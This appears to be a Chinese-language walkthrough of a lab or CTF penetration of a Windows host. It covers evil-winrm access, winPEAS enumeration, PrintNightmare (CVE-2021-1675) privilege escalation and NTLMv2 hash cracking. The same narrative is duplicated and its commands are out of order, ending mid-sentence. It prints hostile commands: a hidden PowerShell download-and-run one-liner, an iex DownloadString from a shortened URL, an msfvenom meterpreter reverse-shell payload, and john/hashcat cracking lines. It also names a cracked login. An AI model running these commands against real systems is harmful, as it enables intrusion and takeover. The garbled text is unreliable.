根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-process notepad.exe

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt

使用Invoke-Command命令远程运行脚本。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=7777 -f exe > hack.exe

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行